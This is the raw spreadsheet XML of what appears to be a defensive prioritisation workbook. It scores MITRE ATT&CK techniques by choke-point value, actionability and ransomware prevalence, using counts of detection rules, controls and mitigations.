    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="2"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="2" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="11" borderId="7" xfId="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="6" fillId="11" borderId="8" xfId="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="6" fillId="11" borderId="9" xfId="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0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="12" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="13" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="14" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="14" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="18" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="19" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="20" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="21" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="22" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="16" borderId="15" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="16" borderId="16" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="16" borderId="17" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="23" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="18" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="4" applyNumberFormat="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="14" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="18" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="18" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="11" fillId="15" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="13" fillId="17" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="12" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="18" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="15" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="14" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="3" applyAlignment="1" applyProtection="1"/>
  </cellXfs>
  <cellStyles count="5">
    <cellStyle name="Good" xfId="1" builtinId="26"/>
    <cellStyle name="Hyperlink" xfId="4" builtinId="8"/>
    <cellStyle name="Hyperlink 2" xfId="3" xr:uid="{3AA4B3EF-D78B-AB4A-B334-8EBB52A2930F}"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Normal 2" xfId="2" xr:uid="{6C0BDFEF-4B8F-A247-80EF-9C2D2966FA8B}"/>
  </cellStyles>
  <dxfs count="11">
    <dxf>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="7" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="7" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="7" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="7" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <alignment textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="left" vertical="top" textRotation="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person displayName="Alexia Crumpton" id="{904307EF-B3E5-4244-915F-3902586D9F0C}" userId="S::acrumpton@mitre-engenuity.org::16d55ecf-aa02-4c5c-94f5-e0d5f455a48d"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6231CD7-11E7-BC40-BC9C-2F6EFB148F12}" name="TechniqueData" displayName="TechniqueData" ref="A3:AU641" totalsRowShown="0" headerRowDxfId="10">
  <autoFilter ref="A3:AU641" xr:uid="{16231CD7-11E7-BC40-BC9C-2F6EFB148F12}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A4:AU605">
    <sortCondition ref="C3:C605"/>
  </sortState>
  <tableColumns count="47">
    <tableColumn id="34" xr3:uid="{FFE1ADF8-856B-2A42-A00B-6C62937F49C2}" name="Total Ransomware Top Score (Utility)">
      <calculatedColumnFormula>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="33" xr3:uid="{4EB85A57-872B-4B26-9CF3-D67DA43E0FAD}" name="Total Top Att&amp;ck Score ">
      <calculatedColumnFormula>SUM(H4,M4,V4)*(1+SUM(AF4,AH4,AJ4,AL4,AN4))</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="35" xr3:uid="{89D1303A-F531-4D4F-8F8F-D17CE76ABCCB}" name="Technique (ID)"/>
    <tableColumn id="2" xr3:uid="{74371775-0130-F446-97C3-6C50E8C2D749}" name="Technique (Name)" dataDxfId="9"/>
    <tableColumn id="3" xr3:uid="{E6421C7F-9509-2E4C-9BF4-2E284200B546}" name="Sub-technique (Name)"/>
    <tableColumn id="32" xr3:uid="{25E54F86-DEE0-D842-8D1B-D9D045A38070}" name="Num. TID Before"/>
    <tableColumn id="31" xr3:uid="{14D9ACC4-00F2-7547-B2D1-FC28871FB1B1}" name="Num. TID After"/>
    <tableColumn id="30" xr3:uid="{F4AB1645-3043-504B-84A8-87D73C60DBF7}" name="Choke Point Score">
      <calculatedColumnFormula>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="39" xr3:uid="{C283DC34-A46E-404C-BE7C-4C0F141FCBFC}" name="Before Utility (unclipped)">
      <calculatedColumnFormula>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="38" xr3:uid="{9E2AD081-13C3-EE45-93CB-CD2BAA5DD2BB}" name="Before Utility">
      <calculatedColumnFormula>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="37" xr3:uid="{8E7EDD2D-F81F-5347-A475-4065E509ACD0}" name="After Utility (unclipped)">
      <calculatedColumnFormula>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="36" xr3:uid="{183D54FF-5783-8B40-A499-5EC8983FB991}" name="After Utility">
      <calculatedColumnFormula>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="27" xr3:uid="{3716BA3F-491C-364C-BACC-313C4BAC8609}" name="Prevalence Scores"/>
    <tableColumn id="4" xr3:uid="{AE7A9F16-BA2D-EF4B-ACB9-D99009F39605}" name="Num. CAR" dataDxfId="8"/>
    <tableColumn id="5" xr3:uid="{FD05F95D-7485-AE45-9E06-5DB3602E64E6}" name="Num. Sigma" dataDxfId="7"/>
    <tableColumn id="6" xr3:uid="{678763CB-F7D5-4741-BFA9-8DBFB70E0D89}" name="Num. ES SIEM" dataDxfId="6"/>
    <tableColumn id="7" xr3:uid="{870DF541-E181-2A48-A472-EB99B26E75E1}" name="Num. Splunk" dataDxfId="5"/>
    <tableColumn id="15" xr3:uid="{71DE9E0E-7284-40D2-823E-1340C41189E5}" name="CIS Controls" dataDxfId="4"/>
    <tableColumn id="14" xr3:uid="{9907181B-210D-4917-A218-298AC742360C}" name="Num. CIS Controls" dataDxfId="3"/>
    <tableColumn id="16" xr3:uid="{ED8FF4B2-0FA4-426D-A483-5A34565188FC}" name="NIST Controls" dataDxfId="2"/>
    <tableColumn id="8" xr3:uid="{0343C2C1-C45D-8645-A7F8-FB40112F5C95}" name="Num. 800-53 (r5)" dataDxfId="1"/>
    <tableColumn id="10" xr3:uid="{CAB14FCA-E8B8-4C00-9F33-0DB4559642C4}" name="Actionability Score">
      <calculatedColumnFormula>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="45" xr3:uid="{CF92AE1B-0A23-1041-876D-F93227FF8F24}" name="Total Mitigations"/>
    <tableColumn id="44" xr3:uid="{757C89C0-FCE6-2242-9DAB-68228BB380DC}" name="Mitigations Utility (unclipped)"/>
    <tableColumn id="43" xr3:uid="{92D5B6D0-5989-AC47-A8BF-21F4067CA15C}" name="Mitigations Utility"/>
    <tableColumn id="42" xr3:uid="{CF6693FD-5839-1243-BD89-2C9AB3FFE291}" name="Total Detections"/>
    <tableColumn id="41" xr3:uid="{DBD0165B-2245-2244-8DF8-F2BD4D4C8894}" name="Detections Utility (unclipped)"/>
    <tableColumn id="40" xr3:uid="{F7D7FA57-2522-DB42-AFF8-405E1E1B276A}" name="Detections Utility"/>
    <tableColumn id="1" xr3:uid="{CE3BAD23-65F9-8448-AB07-4988E1B4416B}" name="Technique Status"/>
    <tableColumn id="17" xr3:uid="{065848EB-5E17-43BB-8601-CD50132D61E6}" name="data sources" dataDxfId="0"/>
    <tableColumn id="19" xr3:uid="{24078B67-B6D9-46C9-B814-D855EB8A71A8}" name="Process Coverage">
      <calculatedColumnFormula array="1">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD4)))))&gt;0,"1","0")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="24" xr3:uid="{6A61B421-4EAA-C846-AF5F-0AEC845F38C2}" name="Process Modifier"/>
    <tableColumn id="20" xr3:uid="{4D532940-A715-4A08-8D8D-6E9B65B0D55E}" name="Network Coverage">
      <calculatedColumnFormula array="1">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD4)))))&gt;0,"1","0")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="18" xr3:uid="{C7E4A516-E74B-C547-9FB4-02F25AED3967}" name="Network Modifier"/>
    <tableColumn id="21" xr3:uid="{85237D7C-AE1E-464D-A4E4-0CA77D3020BC}" name="File Coverage">
      <calculatedColumnFormula array="1">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD4)))))&gt;0,"1","0")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="13" xr3:uid="{A078EFA7-3462-9245-B855-5B565C0A2959}" name="File Modifier"/>
    <tableColumn id="22" xr3:uid="{F6E76C3E-2D0B-4F84-BE18-4F28D6BAAD92}" name="Cloud Coverage">
      <calculatedColumnFormula array="1">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD4)))))&gt;0,"1","0")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="11" xr3:uid="{AEDF0A33-C613-3040-B1C3-B4503E0BB5F4}" name="Cloud Modifier"/>
    <tableColumn id="23" xr3:uid="{BEF7F23C-B167-4B66-9114-34E12057D796}" name="Hardware Coverage">
      <calculatedColumnFormula array="1">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD4)))))&gt;0,"1","0")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="9" xr3:uid="{A4C8D28E-261E-4940-873F-0764116FA7FE}" name="Hardware Modifier"/>
    <tableColumn id="25" xr3:uid="{234AAD8E-8C3C-4864-97AE-AEF24856102F}" name="Ransomware (Total # of ATT&amp;CK Observations)"/>
    <tableColumn id="12" xr3:uid="{02C0A71B-5D73-41F6-8F3D-AD4789B8B46C}" name="Total Ransomware Top Score (Utility)2">
      <calculatedColumnFormula>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="29" xr3:uid="{C0257BC7-8D5C-47CA-9E90-6BA62E9E3728}" name="TAT Utility (unclipped)">
      <calculatedColumnFormula>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="46" xr3:uid="{95BE68C9-141A-4F5F-A9DF-E6C3696547B0}" name="TAT Utility">
      <calculatedColumnFormula>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="47" xr3:uid="{5DC5FC8F-3666-4E87-94D3-04DC864E3CD1}" name="Count Utility (unclipped)">
      <calculatedColumnFormula>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="48" xr3:uid="{BE7138C8-4511-4671-9BE1-8FA330A033E0}" name="Count Utility">
      <calculatedColumnFormula>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="28" xr3:uid="{05759BF5-0105-4501-9A20-BF37443652F8}" name="Total Ransomware Top Score (Polynomial)2">
      <calculatedColumnFormula>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calculatedColumnFormula>
    </tableColumn>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight1"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2" dT="2022-03-03T21:17:14.89" personId="{904307EF-B3E5-4244-915F-3902586D9F0C}" id="{C8C0DA6D-81EC-4D8E-B0EB-4EDDEC5EA839}">
    <text>Ease of Use 
Response Time 
OS Coverage (Visibility)</text>
  </threadedComment>
  <threadedComment ref="C5" dT="2022-03-03T21:37:32.52" personId="{904307EF-B3E5-4244-915F-3902586D9F0C}" id="{EB64C9E7-13DF-417D-96BB-2AB76B32F74D}">
    <text xml:space="preserve">Without the right tools or processes to aggregate and make sense of all the data, your team might not be effective yet after automating a few rules/queries. Hunters might be running queries and still get a very high amount of events that still need to be analyzed.
Tools collecting/integrating the right data (NOT JUST MORE DATA) to improve the detection of an adversary technique.
</text>
  </threadedComment>
  <threadedComment ref="C6" dT="2022-03-03T21:40:10.11" personId="{904307EF-B3E5-4244-915F-3902586D9F0C}" id="{0DBD9DCC-E22C-4CA6-B2A3-5FB64D883C65}">
    <text>Tools helping you leverage more than just simple outlier detection techniques. Here is where the capability of using advanced data science techniques are posible with the right libraries and plugins provided by your tools with access to your data (i.e Integration of Spark Analytics). (Remember, data science concepts such as machine learning might not be applicable to every single use case or technique that you are trying to detect). If you can validate the detection of an adversay technique by just applying basic data science techniques, then you might be already in the "Very Good" level.</text>
  </threadedComment>
</ThreadedComment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techniques/T1001" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1050" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1034" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1024" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1017" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1040" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1015" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1039" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1035" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1036" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1053" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1054" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1052" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1056" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1020" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1043" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1029" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1013" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1045" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1055" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1033" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1025" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1021" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1016" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1046" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1049" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1057" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1044" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M101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27978-445B-B940-9D99-F64F67CA40D8}">
  <dimension ref="A1:G27"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E12" sqref="E12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11" defaultRowHeight="16"/>
  <cols>
    <col min="1" max="1" width="44.5" customWidth="1"/>
    <col min="2" max="2" width="11.1640625" customWidth="1"/>
    <col min="3" max="3" width="36.6640625" customWidth="1"/>
    <col min="5" max="5" width="29.1640625" customWidth="1"/>
    <col min="6" max="6" width="9.6640625" customWidth="1"/>
    <col min="7" max="7" width="41" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7">
      <c r="A1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" spans="1:7">
      <c r="A2" s="21" t="s">
        <v>1</v>
      </c>
      <c r="B2" s="22" t="s">
        <v>2</v>
      </c>
      <c r="C2" s="23" t="s">
        <v>3</v>
      </c>
      <c r="E2" s="44" t="s">
        <v>4</v>
      </c>
      <c r="F2" s="45" t="s">
        <v>2</v>
      </c>
      <c r="G2" s="46" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="3" spans="1:7">
      <c r="A3" s="24" cm="1">
        <f t="array" ref="A3:C12">_xlfn._xlws.SORT(_xlfn._xlws.FILTER(Methodology!B4:D641,Methodology!B4:B641&gt;=LARGE(Methodology!B4:B641,10)),1,-1)</f>
        <v>3595.7685788095241</v>
      </c>
      <c r="B3" t="str">
        <v>T1574</v>
      </c>
      <c r="C3" s="25" t="str">
        <v>Hijack Execution Flow</v>
      </c>
      <c r="E3" s="49" cm="1">
        <f t="array" ref="E3:G12">_xlfn._xlws.SORT(
    _xlfn.CHOOSECOLS(
        _xlfn._xlws.FILTER(
            TechniqueData[[Total Ransomware Top Score (Utility)]:[Technique (Name)]],
            TechniqueData[Total Ransomware Top Score (Utility)]&gt;=LARGE(TechniqueData[Total Ransomware Top Score (Utility)], 10)
        ),
        1,
        3,
        4
    ),
    1,
    -1
)</f>
        <v>0.8666666666666667</v>
      </c>
      <c r="F3" t="str">
        <v>T1486</v>
      </c>
      <c r="G3" s="40" t="str">
        <v>Data Encrypted for Impact</v>
      </c>
    </row>
    <row r="4" spans="1:7">
      <c r="A4" s="24">
        <v>3163.7479529523812</v>
      </c>
      <c r="B4" t="str">
        <v>T1562</v>
      </c>
      <c r="C4" s="25" t="str">
        <v>Impair Defenses</v>
      </c>
